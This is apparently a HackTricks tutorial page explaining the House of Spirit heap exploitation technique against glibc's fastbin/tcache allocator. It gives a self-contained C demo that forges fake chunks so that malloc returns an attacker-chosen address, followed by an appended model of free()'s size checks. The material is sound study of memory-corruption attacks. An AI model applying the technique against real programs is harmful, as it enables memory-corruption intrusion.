House of Spirit

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic Information

Code

House of Spirit
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add some prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
  size_t prev_size;
  size_t size;
  struct fast_chunk *fd;
  struct fast_chunk *bk;
  char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
  struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
  void *ptr, *victim;

  ptr = malloc(0x30);

  printf("Original alloc address: %p\n", ptr);
  printf("Main fake chunk:%p\n", &fake_chunks[0]);
  printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

  // Passes size check of "free(): invalid size"
  fake_chunks[0].size = sizeof(struct fast_chunk);

  // Passes "free(): invalid next size (fast)"
  fake_chunks[1].size = sizeof(struct fast_chunk);

  // Attacker overwrites a pointer that is about to be 'freed'
  // Point to .fd as it's the start of the content of the chunk
  ptr = (void *)&fake_chunks[0].fd;

  free(ptr);

  victim = malloc(0x30);
  printf("Victim: %p\n", victim);

  return 0;
}

Goal

  • Be able to insert an arbitrary address into the tcache / fast bin, so that a later call to malloc returns that address as a chunk

Requirements

  • This attack requires the attacker to be able to create a couple of fake fast chunks with a correct size field, and to overwrite a pointer to a fast chunk of that size that is about to be freed, so that the attacker's fake chunk is the one that actually ends up in the fast bin.

Attack

  • Create a fake chunk that bypasses the security checks (you will need 2 fake chunks, since free also checks the size field of the next chunk)

  • Before a pointer is freed, overwrite it with the address of the fake chunk, so that the fake chunk is the one that gets into the bin
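To see why the demo above needs both fake size fields, the following is an added illustration (not code from the page or from the linked write-up) that models the two free() checks the demo's comments quote, plus the request-to-chunk-size rounding that makes malloc(0x30) line up with a 0x40 fake chunk. The constants are the 64-bit glibc defaults; SYSTEM_MEM is an assumed value for a fresh main heap.

```c
#include <stddef.h>
#include <stdio.h>

/* 64-bit glibc defaults, restated here (this is a model, not glibc's own code). */
#define SIZE_SZ       8
#define MALLOC_ALIGN  16
#define MINSIZE       0x20
#define CHUNK_HDR_SZ  (2 * SIZE_SZ)
#define MAX_FAST      0x80     /* default global_max_fast on 64-bit */
#define SYSTEM_MEM    0x21000  /* assumed av->system_mem of a fresh main heap */

enum free_result { FREE_OK = 0, ERR_INVALID_SIZE, ERR_INVALID_NEXT_SIZE, NOT_FAST };

/* request2size(): user request -> chunk size. Shows why the demo's malloc(0x30)
 * is served by a 0x40 chunk, the size the fake chunk advertises. */
size_t request2size(size_t req)
{
    size_t sz = req + SIZE_SZ + MALLOC_ALIGN - 1;
    return sz < MINSIZE ? MINSIZE : (sz & ~(size_t)(MALLOC_ALIGN - 1));
}

/* Model of the two _int_free checks named in the demo's comments (fastbin path).
 * size: the fake chunk's size field; next_size: the size field found `size`
 * bytes after the fake chunk header (the demo's fake_chunks[1].size). */
enum free_result model_fastbin_free(size_t size, size_t next_size)
{
    size_t sz = size & ~(size_t)7;             /* chunksize(): drop the flag bits */
    if (sz < MINSIZE || (sz & (MALLOC_ALIGN - 1)) != 0)
        return ERR_INVALID_SIZE;               /* "free(): invalid size" */
    if (sz > MAX_FAST)
        return NOT_FAST;                       /* not a fast chunk: other paths apply */
    size_t nsz = next_size & ~(size_t)7;
    if (next_size <= CHUNK_HDR_SZ || nsz >= SYSTEM_MEM)
        return ERR_INVALID_NEXT_SIZE;          /* "free(): invalid next size (fast)" */
    return FREE_OK;
}

int main(void)
{
    static const char *names[] = { "ok", "invalid size", "invalid next size (fast)", "not fast" };
    size_t demo = request2size(0x30);                     /* 0x40, as in the page's code */
    printf("malloc(0x30) -> chunk size 0x%zx\n", demo);
    printf("both fakes 0x40            : %s\n", names[model_fastbin_free(demo, demo)]);
    printf("second fake left at 0      : %s\n", names[model_fastbin_free(demo, 0)]);
    printf("first fake 0x48 (unaligned): %s\n", names[model_fastbin_free(0x48, demo)]);
    printf("first fake 0x90 (> max_fast): %s\n", names[model_fastbin_free(0x90, demo)]);
    return 0;
}
```

On glibc 2.26 and later the tcache path in _int_free returns right after the size check, so for a chunk within tcache range and a non-full tcache bin only the first check applies; the next-size check, and therefore the second fake chunk, matters once the chunk falls through to the fastbin path.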
